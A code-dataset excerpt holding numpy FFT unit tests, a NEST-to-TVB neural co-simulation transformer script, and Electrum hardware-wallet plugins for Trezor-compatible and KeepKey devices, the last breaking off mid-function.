source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
test_pocketfft.py
|
import numpy as np
import pytest
from numpy.random import random
from numpy.testing import (
assert_array_equal, assert_raises, assert_allclose
)
import threading
import sys
if sys.version_info[0] >= 3:
import queue
else:
import Queue as queue
def fft1(x):
L = len(x)
phase = -2j*np.pi*(np.arange(L)/float(L))
phase = np.arange(L).reshape(-1, 1) * phase
return np.sum(x*np.exp(phase), axis=1)
class TestFFTShift:
def test_fft_n(self):
assert_raises(ValueError, np.fft.fft, [1, 2, 3], 0)
class TestFFT1D:
def test_identity(self):
maxlen = 512
x = random(maxlen) + 1j*random(maxlen)
xr = random(maxlen)
for i in range(1,maxlen):
assert_allclose(np.fft.ifft(np.fft.fft(x[0:i])), x[0:i],
atol=1e-12)
assert_allclose(np.fft.irfft(np.fft.rfft(xr[0:i]),i),
xr[0:i], atol=1e-12)
def test_fft(self):
x = random(30) + 1j*random(30)
assert_allclose(fft1(x), np.fft.fft(x), atol=1e-6)
assert_allclose(fft1(x) / np.sqrt(30),
np.fft.fft(x, norm="ortho"), atol=1e-6)
@pytest.mark.parametrize('norm', (None, 'ortho'))
def test_ifft(self, norm):
x = random(30) + 1j*random(30)
assert_allclose(
x, np.fft.ifft(np.fft.fft(x, norm=norm), norm=norm),
atol=1e-6)
# Ensure we get the correct error message
with pytest.raises(ValueError,
match='Invalid number of FFT data points'):
np.fft.ifft([], norm=norm)
def test_fft2(self):
x = random((30, 20)) + 1j*random((30, 20))
assert_allclose(np.fft.fft(np.fft.fft(x, axis=1), axis=0),
np.fft.fft2(x), atol=1e-6)
assert_allclose(np.fft.fft2(x) / np.sqrt(30 * 20),
np.fft.fft2(x, norm="ortho"), atol=1e-6)
def test_ifft2(self):
x = random((30, 20)) + 1j*random((30, 20))
assert_allclose(np.fft.ifft(np.fft.ifft(x, axis=1), axis=0),
np.fft.ifft2(x), atol=1e-6)
assert_allclose(np.fft.ifft2(x) * np.sqrt(30 * 20),
np.fft.ifft2(x, norm="ortho"), atol=1e-6)
def test_fftn(self):
x = random((30, 20, 10)) + 1j*random((30, 20, 10))
assert_allclose(
np.fft.fft(np.fft.fft(np.fft.fft(x, axis=2), axis=1), axis=0),
np.fft.fftn(x), atol=1e-6)
assert_allclose(np.fft.fftn(x) / np.sqrt(30 * 20 * 10),
np.fft.fftn(x, norm="ortho"), atol=1e-6)
def test_ifftn(self):
x = random((30, 20, 10)) + 1j*random((30, 20, 10))
assert_allclose(
np.fft.ifft(np.fft.ifft(np.fft.ifft(x, axis=2), axis=1), axis=0),
np.fft.ifftn(x), atol=1e-6)
assert_allclose(np.fft.ifftn(x) * np.sqrt(30 * 20 * 10),
np.fft.ifftn(x, norm="ortho"), atol=1e-6)
def test_rfft(self):
x = random(30)
for n in [x.size, 2*x.size]:
for norm in [None, 'ortho']:
assert_allclose(
np.fft.fft(x, n=n, norm=norm)[:(n//2 + 1)],
np.fft.rfft(x, n=n, norm=norm), atol=1e-6)
assert_allclose(
np.fft.rfft(x, n=n) / np.sqrt(n),
np.fft.rfft(x, n=n, norm="ortho"), atol=1e-6)
def test_irfft(self):
x = random(30)
assert_allclose(x, np.fft.irfft(np.fft.rfft(x)), atol=1e-6)
assert_allclose(
x, np.fft.irfft(np.fft.rfft(x, norm="ortho"), norm="ortho"), atol=1e-6)
def test_rfft2(self):
x = random((30, 20))
assert_allclose(np.fft.fft2(x)[:, :11], np.fft.rfft2(x), atol=1e-6)
assert_allclose(np.fft.rfft2(x) / np.sqrt(30 * 20),
np.fft.rfft2(x, norm="ortho"), atol=1e-6)
def test_irfft2(self):
x = random((30, 20))
assert_allclose(x, np.fft.irfft2(np.fft.rfft2(x)), atol=1e-6)
assert_allclose(
x, np.fft.irfft2(np.fft.rfft2(x, norm="ortho"), norm="ortho"), atol=1e-6)
def test_rfftn(self):
x = random((30, 20, 10))
assert_allclose(np.fft.fftn(x)[:, :, :6], np.fft.rfftn(x), atol=1e-6)
assert_allclose(np.fft.rfftn(x) / np.sqrt(30 * 20 * 10),
np.fft.rfftn(x, norm="ortho"), atol=1e-6)
def test_irfftn(self):
x = random((30, 20, 10))
assert_allclose(x, np.fft.irfftn(np.fft.rfftn(x)), atol=1e-6)
assert_allclose(
x, np.fft.irfftn(np.fft.rfftn(x, norm="ortho"), norm="ortho"), atol=1e-6)
def test_hfft(self):
x = random(14) + 1j*random(14)
x_herm = np.concatenate((random(1), x, random(1)))
x = np.concatenate((x_herm, x[::-1].conj()))
assert_allclose(np.fft.fft(x), np.fft.hfft(x_herm), atol=1e-6)
assert_allclose(np.fft.hfft(x_herm) / np.sqrt(30),
np.fft.hfft(x_herm, norm="ortho"), atol=1e-6)
def test_ihttf(self):
x = random(14) + 1j*random(14)
x_herm = np.concatenate((random(1), x, random(1)))
x = np.concatenate((x_herm, x[::-1].conj()))
assert_allclose(x_herm, np.fft.ihfft(np.fft.hfft(x_herm)), atol=1e-6)
assert_allclose(
x_herm, np.fft.ihfft(np.fft.hfft(x_herm, norm="ortho"),
norm="ortho"), atol=1e-6)
@pytest.mark.parametrize("op", [np.fft.fftn, np.fft.ifftn,
np.fft.rfftn, np.fft.irfftn])
def test_axes(self, op):
x = random((30, 20, 10))
axes = [(0, 1, 2), (0, 2, 1), (1, 0, 2), (1, 2, 0), (2, 0, 1), (2, 1, 0)]
for a in axes:
op_tr = op(np.transpose(x, a))
tr_op = np.transpose(op(x, axes=a), a)
assert_allclose(op_tr, tr_op, atol=1e-6)
def test_all_1d_norm_preserving(self):
# verify that round-trip transforms are norm-preserving
x = random(30)
x_norm = np.linalg.norm(x)
n = x.size * 2
func_pairs = [(np.fft.fft, np.fft.ifft),
(np.fft.rfft, np.fft.irfft),
# hfft: order so the first function takes x.size samples
# (necessary for comparison to x_norm above)
(np.fft.ihfft, np.fft.hfft),
]
for forw, back in func_pairs:
for n in [x.size, 2*x.size]:
for norm in [None, 'ortho']:
tmp = forw(x, n=n, norm=norm)
tmp = back(tmp, n=n, norm=norm)
assert_allclose(x_norm,
np.linalg.norm(tmp), atol=1e-6)
@pytest.mark.parametrize("dtype", [np.half, np.single, np.double,
np.longdouble])
def test_dtypes(self, dtype):
# make sure that all input precisions are accepted and internally
# converted to 64bit
x = random(30).astype(dtype)
assert_allclose(np.fft.ifft(np.fft.fft(x)), x, atol=1e-6)
assert_allclose(np.fft.irfft(np.fft.rfft(x)), x, atol=1e-6)
@pytest.mark.parametrize(
"dtype",
[np.float32, np.float64, np.complex64, np.complex128])
@pytest.mark.parametrize("order", ["F", 'non-contiguous'])
@pytest.mark.parametrize(
"fft",
[np.fft.fft, np.fft.fft2, np.fft.fftn,
np.fft.ifft, np.fft.ifft2, np.fft.ifftn])
def test_fft_with_order(dtype, order, fft):
# Check that FFT/IFFT produces identical results for C, Fortran and
# non contiguous arrays
rng = np.random.RandomState(42)
X = rng.rand(8, 7, 13).astype(dtype, copy=False)
# See discussion in pull/14178
_tol = 8.0 * np.sqrt(np.log2(X.size)) * np.finfo(X.dtype).eps
if order == 'F':
Y = np.asfortranarray(X)
else:
# Make a non contiguous array
Y = X[::-1]
X = np.ascontiguousarray(X[::-1])
if fft.__name__.endswith('fft'):
for axis in range(3):
X_res = fft(X, axis=axis)
Y_res = fft(Y, axis=axis)
assert_allclose(X_res, Y_res, atol=_tol, rtol=_tol)
elif fft.__name__.endswith(('fft2', 'fftn')):
axes = [(0, 1), (1, 2), (0, 2)]
if fft.__name__.endswith('fftn'):
axes.extend([(0,), (1,), (2,), None])
for ax in axes:
X_res = fft(X, axes=ax)
Y_res = fft(Y, axes=ax)
assert_allclose(X_res, Y_res, atol=_tol, rtol=_tol)
else:
raise ValueError()
class TestFFTThreadSafe:
threads = 16
input_shape = (800, 200)
def _test_mtsame(self, func, *args):
def worker(args, q):
q.put(func(*args))
q = queue.Queue()
expected = func(*args)
# Spin off a bunch of threads to call the same function simultaneously
t = [threading.Thread(target=worker, args=(args, q))
for i in range(self.threads)]
[x.start() for x in t]
[x.join() for x in t]
# Make sure all threads returned the correct value
for i in range(self.threads):
assert_array_equal(q.get(timeout=5), expected,
'Function returned wrong value in multithreaded context')
def test_fft(self):
a = np.ones(self.input_shape) * 1+0j
self._test_mtsame(np.fft.fft, a)
def test_ifft(self):
a = np.ones(self.input_shape) * 1+0j
self._test_mtsame(np.fft.ifft, a)
def test_rfft(self):
a = np.ones(self.input_shape)
self._test_mtsame(np.fft.rfft, a)
def test_irfft(self):
a = np.ones(self.input_shape) * 1+0j
self._test_mtsame(np.fft.irfft, a)
|
nest_to_tvb.py
|
# Copyright 2020 Forschungszentrum Jülich GmbH and Aix-Marseille Université
# "Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements; and to You under the Apache License, Version 2.0. "
from mpi4py import MPI
import os
import json
import time
import numpy as np
from nest_elephant_tvb.utils import create_logger
from nest_elephant_tvb.transformation.simulator_IO.Nest_IO import ConsumerNestData
from nest_elephant_tvb.transformation.simulator_IO.TVB_IO import ProducerTVBData
from nest_elephant_tvb.transformation.transformation_function.transformation_function import TransformationSpikeRate
from nest_elephant_tvb.transformation.communication.internal_mpi import MPICommunication
from nest_elephant_tvb.transformation.communication.internal_thread import ThreadCommunication
if __name__ == "__main__":
import sys
if len(sys.argv) != 2:
print('incorrect number of arguments')
exit(1)
# Parse arguments
path = sys.argv[1] # path of the simulation
# path = "/home/vagrant/multiscale-cosim-repos/TVB-NEST-demo/result_sim/co-simulation/"
id_transformer = 0 # index of the transformer
# take the parameters and instantiate objects
with open(path + '/parameter.json') as f:
parameters = json.load(f)
id_proxy = [0]
level_log = parameters['level_log']
logger = create_logger(path, 'nest_to_tvb_' + str(id_transformer), level_log)
rank = MPI.COMM_WORLD.Get_rank()
# get information from NEST
while not os.path.exists(path + '/nest/spike_detector.txt.unlock'):
logger.info("spike detector ids not found yet, retry in 1 second")
time.sleep(1)
spike_detector = np.loadtxt(path + '/nest/spike_detector.txt', dtype=int)
# case of one spike detector
try:
spike_detector = np.array([int(spike_detector)])
except:
pass
id_spike_detector = spike_detector[id_transformer]
file_spike_detector = "/transformation/spike_detector/" + str(id_spike_detector) + ".txt"
TVB_recev_file = "/transformation/send_to_tvb/" + str(id_proxy[id_transformer]) + ".txt"
id_spike_detector = os.path.splitext(os.path.basename(path + file_spike_detector))[0]
if MPI.COMM_WORLD.Get_size() == 3: # MPI internal communication
if rank == 0: # communication with Nest
receive_data_from_nest = ConsumerNestData(
'nest_to_tvb_receive' + str(id_spike_detector), path, level_log,
communication_intern=MPICommunication, buffer_r_w=[2, 0])
path_to_files_receive = [path + file_spike_detector]
receive_data_from_nest.run(path_to_files_receive)
elif rank == 1: # communication with TVB
send_data_to_TVB = ProducerTVBData(
'nest_to_tvb_send' + str(id_spike_detector), path, level_log,
communication_intern=MPICommunication, sender_rank=2, buffer_r_w=[2, 0])
path_to_files_send = [path + TVB_recev_file]
send_data_to_TVB.run(path_to_files_send)
elif rank == 2: # transformation from spike to rate
transformation = TransformationSpikeRate(
id_transformer, parameters,
'nest_to_tvb_translate' + str(id_spike_detector), path, level_log,
communication_intern=MPICommunication, receiver_rank=1, buffer_r_w=[2, 0])
transformation.run(None)
else:
raise Exception('too much rank')
elif MPI.COMM_WORLD.Get_size() == 1: # Thread internal communication
from threading import Thread
import numpy as np
# creation of the object for Nest communication
receive_data_from_nest = ConsumerNestData(
'nest_to_tvb_receive' + str(id_spike_detector), path, level_log,
communication_intern=ThreadCommunication,
buffer_write_status=np.ones((1, 1), dtype=int) * -2,
buffer_write_shape=(1000000 * 3, 1),
)
path_to_files_receive = [path + file_spike_detector]
# creation of the object for the transformation from rate to spike
transformation = TransformationSpikeRate(
id_transformer, parameters,
'nest_to_tvb_transform' + str(id_spike_detector), path, level_log,
communication_intern=ThreadCommunication,
buffer_write_status=np.ones(1) * -2,
buffer_write_shape=(2, int(parameters['time_synchronization'] / parameters['resolution'])),
buffer_read=receive_data_from_nest.communication_internal.buffer_write_data,
status_read=receive_data_from_nest.communication_internal.status_write,
lock_read=receive_data_from_nest.communication_internal.lock_write
)
# creation of the object for TVB communication
send_data_to_TVB = ProducerTVBData(
'nest_to_tvb_send' + str(id_spike_detector), path, level_log,
communication_intern=ThreadCommunication,
buffer_read=transformation.communication_internal.buffer_write_data,
status_read=transformation.communication_internal.status_write,
lock_read=transformation.communication_internal.lock_write
)
path_to_files_send = [path + TVB_recev_file]
# creation of the threads and run them
th_receive = Thread(target=receive_data_from_nest.run, args=(path_to_files_receive,))
th_transformation = Thread(target=transformation.run, args=(None,))
th_send = Thread(target=send_data_to_TVB.run, args=(path_to_files_send,))
th_receive.start()
th_transformation.start()
th_send.start()
th_transformation.join()
th_receive.join()
th_send.join()
else:
raise Exception('Wrong number of MPI rank. The rank need to be 1 or 3')
if id_transformer == 0 and rank == 1:
os.remove(path + '/nest/spike_detector.txt.unlock')
|
plugin.py
|
import base64
import re
import threading
from binascii import hexlify, unhexlify
from functools import partial
from electrum_desire.bitcoin import (bc_address_to_hash_160, xpub_from_pubkey,
public_key_to_p2pkh, EncodeBase58Check,
TYPE_ADDRESS, TYPE_SCRIPT,
TESTNET, ADDRTYPE_P2PKH, ADDRTYPE_P2SH)
from electrum_desire.i18n import _
from electrum_desire.plugins import BasePlugin, hook
from electrum_desire.transaction import deserialize, Transaction
from electrum_desire.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class TrezorCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by %s') % self.device)
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated %s firmware for device labelled %s. Please '
'download the updated firmware from %s') %
(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
# All client interaction should not be in the main GUI thread
assert self.main_thread != threading.current_thread()
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Desire Testnet" if TESTNET else "Desire"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your %s.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your %s, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
) % (self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER and self.device == 'TREZOR':
# Warn user about firmware lameness
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard):
'''Called when creating a new wallet. Select the device to use. If
the device is uninitialized, go through the intialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m')
client.used()
def get_xpub(self, device_id, derivation, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = signed_tx.encode('hex')
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
client.get_address(self.get_coin_name(), address_n, True)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, x_pubkey.decode('hex'))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: x.decode('hex')[:-1] if x else '', txin.get('signatures')),
m=txin.get('num_sig'),
)
txinputtype = self.types.TxInputType(
script_type=self.types.SPENDMULTISIG,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = txin['scriptSig'].decode('hex')
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
addrtype, hash_160 = bc_address_to_hash_160(address)
index, xpubs, m = info
if addrtype == ADDRTYPE_P2PKH:
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = self.types.PAYTOADDRESS,
address_n = address_n,
)
elif addrtype == ADDRTYPE_P2SH:
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
script_type = self.types.PAYTOMULTISIG)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
addrtype, hash_160 = bc_address_to_hash_160(address)
if addrtype == ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise BaseException('addrtype')
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = vout['scriptPubKey'].decode('hex')
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for d in WebUsbTransport.enumerate():
if device.id_.startswith(d.getSerialNumber()):
return WebUsbTransport(d)
return WebUsbTransport(device)
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
